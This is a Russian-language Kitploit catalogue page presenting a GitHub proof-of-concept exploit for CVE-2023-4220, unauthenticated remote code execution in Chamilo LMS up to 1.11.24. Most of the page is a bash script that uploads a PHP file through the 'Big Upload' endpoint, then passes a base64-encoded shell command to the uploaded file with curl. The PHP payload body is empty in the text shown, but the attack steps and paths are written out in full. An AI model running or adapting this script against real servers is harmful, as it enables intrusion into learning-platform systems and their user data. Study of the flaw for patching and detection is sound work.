Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-4220 — RCE Chamilo 1.11.24 | Kitploit
Инструменты/GitHubGitHub/charlesgargasson/cve-2023-4220
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеРазработка Полезной Нагрузки
GitHubcharlesgargasson/cve-2023-4220

CVE-2023-4220

RCE Chamilo 1.11.24

Репозиторий
112 лет назадЕщё не проверено
Сайт

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

################################# CVE-2023-4220 RCE Chamilo 1.11.24 #################################

| https://starlabs.sg/advisories/23/23-4220/ | | Chamilo LMS <= 1.11.24 (Beersel 31/08/2023) | Неаутентифицированное удаленное выполнение кода через файл в библиотеке "Big Upload" | | Определение версии: /documentation/changelog.html | | POC ЭКСПЛОЙТ CVE RCE УЯЗВИМОСТЬ |

.. code-block:: bash

#!/bin/bash HOST='http://lms.domain.com' CMD='id'

URL_UPLD='main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported' URL_FILE='main/inc/lib/javascript/bigupload/files/rce.php'

cat <<'EOF'>/tmp/rce.php

EOF

curl -F 'bigUploadFile=@/tmp/rce.php' "$HOST/$URL_UPLD" CMD=$(echo $CMD|base64 -w0| python3 -c "import urllib.parse,sys; print(urllib.parse.quote_plus(sys.stdin.read()))") curl "$HOST/$URL_FILE?aoOoy=$CMD"

|

Скачать инструмент